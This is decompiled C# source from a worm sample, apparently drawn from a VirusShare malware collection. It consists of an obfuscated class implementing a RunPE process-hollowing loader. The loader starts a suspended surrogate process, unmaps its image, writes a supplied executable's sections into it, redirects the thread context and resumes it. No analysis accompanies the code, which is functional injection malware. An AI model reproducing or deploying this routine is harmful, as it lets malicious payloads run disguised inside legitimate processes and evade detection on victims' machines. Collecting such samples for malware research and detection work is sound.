// Decompiled with JetBrains decompiler // Type: ajhfsdlhjasnagfgewfwsg.sadioasudoixzcuoisaudoixuzcoixuzcsad // Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 170F4640-026D-46A0-96EF-63F7CE568476 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security; using System.Text; namespace ajhfsdlhjasnagfgewfwsg { public class sadioasudoixzcuoisaudoixuzcoixuzcsad { private static readonly int[] prot = new int[8] { 1, 16, 2, 32, 4, 64, 4, 64 }; [DebuggerNonUserCode] public sadioasudoixzcuoisaudoixuzcoixuzcsad() { } public static void RunPE(byte[] bytes, string surrogateProcess) { int int32 = BitConverter.ToInt32(bytes, 60); int int16 = (int) BitConverter.ToInt16(bytes, checked (int32 + 6)); IntPtr size1 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 84))); byte[] sInfo = new byte[68]; IntPtr[] pInfo = new IntPtr[4]; IntPtr num1; if (!sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.CreateProcess((string) null, new StringBuilder(surrogateProcess), num1, num1, false, 4, num1, (string) null, sInfo, pInfo)) return; uint[] ctxt = new uint[179]; ctxt[0] = 65538U; IntPtr bufr; IntPtr numRead; if (sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.GetThreadContext(pInfo[1], ctxt) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ReadProcessMemory(pInfo[0], new IntPtr(checked ((long) ctxt[41] + 8L)), ref bufr, new IntPtr(4), ref numRead) && sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.NtUnmapViewOfSection(pInfo[0], bufr) == 0U) { IntPtr hProc1 = pInfo[0]; IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 52))); IntPtr addr1 = num2; IntPtr num3 = new IntPtr(BitConverter.ToInt32(bytes, checked (int32 + 80))); IntPtr size2 = num3; IntPtr baseAddr1 = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64); bool flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead); int num4 = checked (int16 - 1); int num5 = 0; while (num5 <= num4) { int[] dst1 = new int[10]; Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40); byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)]; Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length); IntPtr hProc2 = pInfo[0]; num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3])); IntPtr baseAddr2 = num3; byte[] buff = dst2; num2 = new IntPtr(dst2.Length); IntPtr size3 = num2; ref IntPtr local1 = ref numRead; flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1); IntPtr hProc3 = pInfo[0]; num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3])); IntPtr addr2 = num3; num2 = new IntPtr(dst1[2]); IntPtr size4 = num2; int newProt = sadioasudoixzcuoisaudoixuzcoixuzcsad.prot[dst1[9] >> 29 & 7]; int num6; ref int local2 = ref num6; flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2); checked { ++num5; } } IntPtr hProc4 = pInfo[0]; num3 = new IntPtr(checked ((long) ctxt[41] + 8L)); IntPtr baseAddr3 = num3; byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32()); num2 = new IntPtr(4); IntPtr size5 = num2; ref IntPtr local = ref numRead; flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local); ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40))); sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.SetThreadContext(pInfo[1], ctxt); } sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ResumeThread(pInfo[1]); } [SuppressUnmanagedCodeSecurity] private class Win32 { [DebuggerNonUserCode] public Win32() { } [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool CreateProcess( string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt); [DllImport("ntdll")] public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ReadProcessMemory( IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, IntPtr bufrSize, ref IntPtr numRead); [DllImport("kernel32")] public static extern int ResumeThread(IntPtr hThr); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt); [DllImport("kernel32")] public static extern IntPtr VirtualAllocEx( IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool VirtualProtectEx( IntPtr hProc, IntPtr addr, IntPtr size, int newProt, ref int oldProt); [DllImport("kernel32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool WriteProcessMemory( IntPtr hProc, IntPtr baseAddr, byte[] buff, IntPtr size, ref IntPtr numRead); } } }